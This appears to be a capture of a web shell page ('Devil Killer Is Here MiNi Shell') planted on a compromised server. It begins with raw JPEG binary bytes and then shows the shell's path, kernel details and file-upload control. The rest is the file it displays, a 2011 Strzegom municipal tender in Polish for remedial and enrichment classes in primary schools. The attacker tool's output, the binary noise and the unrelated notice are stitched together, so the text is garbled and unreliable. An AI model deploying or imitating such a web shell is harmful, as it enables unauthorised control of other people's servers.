JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110314/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110314/82593-N-2011.html

<p class="kh_header"><b>Strzegom: Indywidualizacja procesu nauczania i wychowania uczniów klas I - III szkół podstawowych, dla których organem prowadzącym jest Gmina Strzegom</b><br>
<b>Numer ogłoszenia: 82593 - 2011; data zamieszczenia: 14.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Strzegom , ul. Rynek 38, 58-150 Strzegom, woj. dolnośląskie, tel. (074)  856-05-99, faks (074 ) 856-05-16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.strzegom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Indywidualizacja procesu nauczania i wychowania uczniów klas I - III szkół podstawowych, dla których organem prowadzącym jest Gmina Strzegom.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja zajęć dodatkowych wspierających indywidualizację procesu dydaktycznego w szkołach podstawowych na terenie Gminy Strzegom w ramach projektu finansowanego w ramach Projektu Indywidualizacja procesu nauczania i wychowania uczniów klas I - III szkół podstawowych, dla których organem prowadzącym jest Gmina Strzegom współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego. 
Zakres, ilość i rodzaj zajęć w poszczególnych szkołach określają szczegółowe zadania stanowiące części zamówienia. Czas trwania jednej godziny zajęć przewiduje się jako 45 minut nieprzerwanej pracy. 
Przedmiot zamówienia obejmuje następujące części:
Publiczna Szkoła Podstawowa w Kostrzy 1. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji. II sem. 2010/2011 I grupa (7 osób) - 30 h, I sem. 2011/2012 I grupa (7 osób) - 30 h, II sem. 2011/2012 I grupa (7 osób) - 30 h razem 90 godzin dla 7 uczniów ogółem. 2. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych.  II sem. 2010/2011 I grupa (4 osoby) - 30 h, I sem. 2011/2012 I grupa (4 osoby) - 15 h, II sem. 2011/2012 I grupa (4 osoby) - 15 h razem 60 godzin dla 4 uczniów ogółem. 3. Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy. II sem. 2010/2011 I grupa (4 osoby), II grupa (4 osoby) po 30 h w każdej grupie, I sem. 2011/2012 I grupa (4 osoby), II grupa (4 osoby) po  15 h w każdej grupie,            II sem. 2011/2012 I grupa (4 osoby) II grupa (4 osoby) po 15 h w każdej grupie razem 120 godzin dla 8 uczniów ogółem. 4. Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej. II sem. 2010/2011 I grupa (6 osób) - 30 h, I sem. 2011/2012 I grupa (6 osób) - 15 h, II sem. 2011/2012 I grupa (6osób) - 15 h razem 60 godzin dla 6 uczniów ogółem. 5. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk przyrodniczych. II sem. 2010/2011 I grupa (4 osoby) - 30 h, I sem. 2011/2012 I grupa (4 osoby) - 15 h, II sem. 2011/2012 I grupa (4 osoby) - 15 h razem 60 godzin dla 4 uczniów ogółem. 6. Zajęcia rozwijające zainteresowania uczniów wybitnie szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk matematycznych. II sem. 2010/2011 I grupa (4 osoby) - 30 h, I sem. 2011/2012 I grupa (4 osoby) - 15 h, II sem. 2011/2012 I grupa (4 osoby) - 15 h razem 60 godzin dla 4 uczniów ogółem. Publiczna Szkoła Podstawowa w Jaroszowie 7. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji. II sem. 2010/2011 I grupa (8 osób) - 30 h, I sem. 2011/2012 I grupa (8 osób) - 30 h, II sem. 2011/2012 I grupa (8 osób) - 30 h razem 90 godzin dla 8 uczniów ogółem. 8. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych. II sem. 2010/2011 I grupa (8 osób) - 30 h, I sem. 2011/2012 I grupa (8 osób) - 30 h, II sem. 2011/2012 I grupa (8 osób) - 30 h razem 90 godzin dla 8 uczniów ogółem. 9. Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy. II sem. 2010/2011 I grupa (4 osoby), II grupa (3 osoby) po 30 h w każdej grupie, I sem. 2011/2012 I grupa (4 osoby), II grupa (3 osoby) po 15 h w każdej grupie, II sem. 2011/2012 I grupa (4 osoby), II grupa (3 osoby) po 15 h w każdej grupie razem 120 godzin dla 7 uczniów ogółem. 10. Gimnastyka korekcyjna dla dzieci z wadami postawy. II sem. 2010/2011 I grupa (12 osób) - 30 h, I sem. 2011/2012 I grupa (12 osób) - 30 h, II sem. 2011/2012 I grupa (12 osób) - 30 h razem 90 godzin dla 12 uczniów ogółem. 11. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk przyrodniczych. II sem. 2010/2011 I grupa (10 osób) - 30 h, I sem. 2011/2012 I grupa (10 osób) - 15 h, II sem. 2011/2012 I grupa (10 osób) - 15 h razem 60 godzin dla 10 uczniów ogółem. Publiczna Szkoła Podstawowa nr 4 w Strzegomiu 12. Zajęcia dla dzieci ze specjalnymi trudnościami w czytaniu i pisaniu w tym zagrożonych dysleksją. II sem. 2010/2011 I grupa (8 osób) II grupa (8 osób) po 30 h w każdej grupie, I sem. 2011/2012 VII grupa (8 osób) VIII grupa (8 osób) po  34 h w każdej grupie, II sem. 2011/2012 VII grupa (8 osób) VIII grupa (8 osób) po 32 h w każdej grupie razem 192 godziny. 13. Zajęcia dla dzieci ze specjalnymi trudnościami w czytaniu i pisaniu w tym zagrożonych dysleksją. II sem. 2010/2011 III grupa (8 osób) IV grupa (8 osób) po 30 h w każdej grupie,  I sem. 2011/2012 III grupa (8 osób) IV grupa (8 osób) po 34 h w każdej grupie, II sem. 2011/2012 III grupa (8 osób) IV grupa (8 osób) po 32 h w każdej grupie razem 192 godziny. 14. Zajęcia dla dzieci ze specjalnymi trudnościami w czytaniu i pisaniu w tym zagrożonych dysleksją. II sem. 2010/2011 V grupa (8 osób) VI grupa (8 osób) po 30 h w każdej grupie, I sem. 2011/2012 V grupa (8 osób) VI grupa (8 osób) po 34 h w każdej grupie, II sem. 2011/2012 V grupa (8 osób) VI grupa (8 osób) po 32 h w każdej grupie razem 192 godziny. 15. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych. II sem. 2010/2011 I grupa (8 osób) - 30 h, I sem. 2011/2012 IV grupa (8 osób) - 34 h, II sem. 2011/2012 IV grupa (8 osób) -32 h razem 96 godzin. 16. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych. II sem. 2010/2011 II grupa (8 osób) - 30 h, I sem. 2011/2012 II grupa (8 osób) - 34 h, II sem. 2011/2012 II grupa (8 osób) - 32 h razem 96 godzin. 17. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych. II sem. 2010/2011 III grupa (8 osób) - 30 h, I sem. 2011/2012 III grupa (8 osób) - 34 h, II sem. 2011/2012 III grupa (8 osób) - 32 h razem 96 godzin. 18. Zajęcia logopedyczne dla dzieci z zaburzeniami mowy. II sem. 2010/2011 I grupa (4 osoby) - 30 h, I sem. 2011/2012 II grupa (4 osoby) -34 h, II sem. 2011/2012 II grupa (4 osoby) - 32 h razem  96 godzin. 19. Gimnastyka korekcyjna dla dzieci z wadami postawy. II sem. 2010/2011 I grupa (7 osób) - 30 h, I sem. 2011/2012 II grupa (5 osób) - 34 h, II sem. 2011/2012 II grupa (5 osób) - 32 h razem               96 godzin. 20. Zajęcia rozwijające zainteresowania uczniów wybitnie uzdolnionych z przyrody. II sem. 2010/2011 I grupa (8 osób) - 30 h, I sem. 2011/2012 II grupa (6 osób) - 34 h, II sem. 2011/2012 II grupa (6 osób) - 32 h razem 96 godzin. 21. Zajęcia rozwijające zainteresowania uczniów wybitnie uzdolnionych matematycznie. II sem. 2010/2011 I grupa (8 osób) - 30 h, I sem. 2011/2012 II grupa (8 osób) - 34 h, II sem. 2011/2012 II grupa (8 osób) - 32 h razem 96 godzin. 22. Specjalistyczne zajęcia terapeutyczne dla dzieci niepełnosprawnych - artoterapia. II sem. 2010/2011 I grupa (5 osób) - 30 h, I sem. 2011/2012 I grupa (5 osób) - 34 h, II sem. 2011/2012 I grupa (5 osób) - 32 h razem 96 godzin. Publiczna Szkoła Podstawowa w Stanowicach 23. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych. II sem. 2010/2011 I grupa (8 osób) - 30 h,  I sem. 2011/2012 I grupa (8 osób) - 30 h, II sem. 2011/2012 I grupa (8 osób) - 30 h razem 90 godzin. 24. Zajęcia dla dzieci ze specjalnymi trudnościami w czytaniu i pisaniu w tym zagrożonych dysleksją. II sem. 2010/2011 I grupa  (7 osób) - 30 h, I sem. 2011/2012 I grupa (7 osób) - 30 h, II sem. 2011/2012 I grupa (7 osób) - 30 h razem 90 godzin. 25. Zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej. II sem. 2010/2011 I grupa (7 osób) - 30 h, I sem. 2011/2012 I grupa (7 osób) - 30 h, II sem. 2011/2012 I grupa (7 osób) - 30 h razem 90 godzin. 26. Gimnastyka korekcyjna dla dzieci z wadami. II sem. 2010/2011 I grupa (11 osób) II grupa (11 osób) po 30 h w każdej grupie, I sem. 2011/2012 I grupa (11 osób) II grupa (11 osób) po 20 h w każdej grupie, II sem. 2011/2012 I grupa (11 osób) II grupa (11 osób) po 15 h w każdej grupie razem 130 godzin. Publiczna Szkoła Podstawowa    w Goczałkowie 27. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji. II sem. 2010/2011 I grupa (8 osób) - 30 h, I sem. 2011/2012 I grupa (8 osób) - 40 h, II sem. 2011/2012 I grupa (8 osób) - 26 h razem 96 godzin. 28. Zajęcia logopedyczne z zaburzeniami rozwoju mowy. II sem. 2010/2011 I grupa (4 osoby) - 30 h, I sem. 2011/2012 I grupa       (4 osoby) - 40 h, II sem. 2011/2012 I grupa (4 osoby) - 26 h razem 96 godzin. 29. Gimnastyka korekcyjna dla dzieci z wadami postawy. II sem. 2010/2011 I grupa (7 osób) - 30 h, I sem. 2011/2012 I grupa (7 osób) - 20 h, II sem. 2011/2012 I grupa (7 osób) - 13 h razem 63 godziny. 30. Zajęcia rozwijające zainteresowania uczniów wybitnie uzdolnionych ze szczególnym uwzględnieniem nauk matematycznych. II sem. 2010/2011 I grupa (10 osób) -30 h, I sem. 2011/2012 I grupa (10 osób) - 40 h, II sem. 2011/2012 I grupa (10 osób) - 26 h razem 96 godzin. 31. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk przyrodniczych. II sem. 2010/2011 I grupa (10 osób) - 30 h, I sem. 2011/2012 I grupa (10 osób) - 20 h, II sem. 2011/2012 I grupa (10 osób) - 13 h razem 63 godziny. Publiczna Szkoła Podstawowa nr 3 w Strzegomiu 32. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych. II sem. 2010/2011 I grupa (8 osób) - 30 h, I sem. 2011/2012 I grupa (8 osób) - 20 h, II sem. 2011/2012 I grupa (8 osób) - 20 h razem 70 godzin. 33. Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy. II sem. 2010/2011 I grupa (4 osoby)  II grupa (4 osoby) III grupa (4 osoby) IV grupa (4 osoby) po 30 h każda grupa, I sem. 2011/2012 I grupa (4 osoby) II grupa (4 osoby) III grupa (4 osoby) IV grupa (4 osoby)  po 15 h każda grupa, II sem. 2011/2012 I grupa (4 osoby) II grupa (4 osoby) III grupa (4 osoby) IV grupa (4 osoby)  po 15 h każda grupa razem 240 godzin. 34. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk przyrodniczych. II sem. 2010/2011 I grupa (10 osób) - 30 h, I sem. 2011/2012 I grupa (10 osób) - 30 h, II sem. 2011/2012 I grupa (10 osób) - 30 h razem 90 godzin. Publiczna Szkoła Podstawowa w Olszanach 35. Zajęcia ze specjalnymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji. II sem. 2010/2011 I grupa (8 osób) - 30 h, I sem. 2011/2012 I grupa (8 osób) - 17 h, II sem. 2011/2012 I grupa (8 osób) - 17 h razem 64 godziny. 36. Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy. II sem. 2010/2011 I grupa (8 osób) - 30 h, I sem. 2011/2012 I grupa (8 osób) - 17 h, II sem. 2011/2012 I grupa (8 osób) - 17 h razem 64 godziny. 37. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych. II sem. 2010/2011 I grupa (4 osoby) - 30 h, I sem. 2011/2012 I grupa (4 osoby) - 17 h, II sem. 2011/2012 I grupa (4 osoby) - 17 h razem 64 godziny. 38. Gimnastyka korekcyjna dla dzieci z wadami postawy. II sem. 2010/2011 I grupa (12 osób) - 30 h, I sem. 2011/2012 I grupa (12 osób) - 17 h, II sem. 2011/2012 I grupa (12 osób) - 17 h razem 64 godziny. Publiczna Szkoła Podstawowa nr 2 w Strzegomiu 39. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym zagrożonych ryzykiem dysleksji. II sem. 2010/2011 I grupa (8 osób) II grupa (7 osób) po 30 h w każdej grupie razem 60 godzin.- termin realizacji do 22-06-2011 r. 40. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu w tym zagrożonych ryzykiem dysleksji. I sem. 2011/2012 III grupa (7 osób) IV grupa (7 osób)  po 30 h w każdej grupie, II sem. 2011/2012 V grupa  (7 osób) - 30 h razem 90 godzin. 41. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych. II sem. 2010/2011 I grupa (8 osób) - 30 h, I sem. 2011/2012 II grupa (8 osób) III grupa (8 osób) po 30 h w każdej grupie, II sem. 2011/2012 IV grupa (7 osób) - 30 h razem 120 godzin. 42. Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy. II sem. 2010/2011 I grupa (4 osoby) II grupa (4 osoby) III grupa (4 osoby) po 30 h, w każdej grupie, I sem. 2011/2012 IV grupa (4 osoby) V grupa (4 osoby) VI grupa (4 osoby) po 30 h w każdej grupie, II sem. 2011/2012 VII grupa (4 osoby) VIII grupa (4 osoby) IX grupa (4 osoby) po 30 h w każdej grupie razem 270 godzin. 43. Gimnastyka korekcyjna dla dzieci z wadami postawy. II sem. 2010/2011 I grupa (10 osób) - 30 h, I sem. 2011/2012 II grupa (10 osób) - 30 h razem 60 godzin. 44. Zajęcia rozwijające zainteresowania uczniów wybitnie uzdolnionych ze szczególnym uwzględnieniem nauk matematycznych. II sem. 2010/2011 I grupa (10 osób) - 30 h, I sem. 2011/2012  II grupa (10 osób) - 30 h, II sem. 2011/2012 III grupa (10 osób) IV grupa (10 osób) po 30 h, w każdej grupie razem 120 godzin. 45. Zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych ze szczególnym uwzględnieniem nauk przyrodniczych. II sem. 2010/2011 I grupa (10 osób) - 30 h, I sem. 2011/2012 II grupa (10 osób) III grupa (10 osób)  po 30 h, w każdej grupie, II sem. 2011/2012 IV grupa (10 osób) - 30 h razem 120 godzin.
Szczegółowy harmonogram realizacji zajęć dodatkowych zostanie sporządzony po wyłonieniu Wykonawcy/ców w porozumieniu z dyrektorem/ami poszczególnych szkół - 1 godzina lekcyjna - 45 min. 
Zamawiający dopuszcza możliwość składania ofert częściowych na jedną lub większą liczbę wymienionych w specyfikacji części zamówienia - zadania od 1 do 45. 
Każdy z wykonawców może złożyć ofertę na wybrane przez siebie zadanie lub zadania.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 45.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia wymaga uprawnień określonych w Rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. z 2009 r. Nr 50, poz. 400).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Osoby, które będą uczestniczyć w wykonaniu zamówienia, tj. prowadzić zajęcia, muszą posiadać kwalifikacje do nauczania w szkole podstawowej zgodne z ww. rozporządzeniem oraz minimum 1 rok doświadczenia w nauczaniu dzieci szkół podstawowych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.
Zamawiający dokona oceny spełniania powyższych warunków na podstawie złożonych przez Wykonawcę dokumentów i oświadczeń wymienionych w punkcie VII specyfikacji na zasadzie spełnia warunek/nie spełnia warunku. Z treści załączonych dokumentów i oświadczeń w sposób jednoznaczny musi wynikać spełnienie przez Wykonawcę wymaganych warunków.
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego warunki określone w pkt 3.2, 3.3, 3.4, 3.5 spełniają łącznie, natomiast każdy z wykonawców wspólnie ubiegających się o zamówienie zobowiązany jest wykazać brak podstaw do wykluczenia go z postępowania na podstawie art. 24 ust. 1 ustawy Pzp, natomiast oświadczenie wymienione w pkt 2.1. rozdziału VII SIWZ musi być złożone w imieniu wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia.
Wykonawcy wspólnie ubiegający się o zamówienie:
1. ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania,
2. zobowiązani są ustanowić Pełnomocnika do reprezentowania ich w postępowaniu 
o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu 
i zawarcia umowy w sprawie zamówienia. Przyjmuje się, że pełnomocnictwo do
 podpisania oferty obejmuje pełnomocnictwo do poświadczenia za zgodność 
z  oryginałem wszystkich dokumentów,
3. pełnomocnictwo musi wynikać z umowy lub z innej czynności prawnej, mieć formę pisemną; fakt ustanowienia Pełnomocnika musi wynikać z załączonych do oferty dokumentów, wszelka korespondencja prowadzona będzie z Pełnomocnikiem,
4. jeżeli oferta konsorcjum zostanie wybrana jako najkorzystniejsza, Zamawiający może przed zawarciem umowy wezwać pełnomocnika do przedstawienia umowy regulującej współpracę tych Wykonawców. 
5. Wszelka korespondencja dokonywana będzie z Wykonawcą występującym jako reprezentant pozostałych (liderem).
6. Oferta musi być podpisana w taki  sposób, aby prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

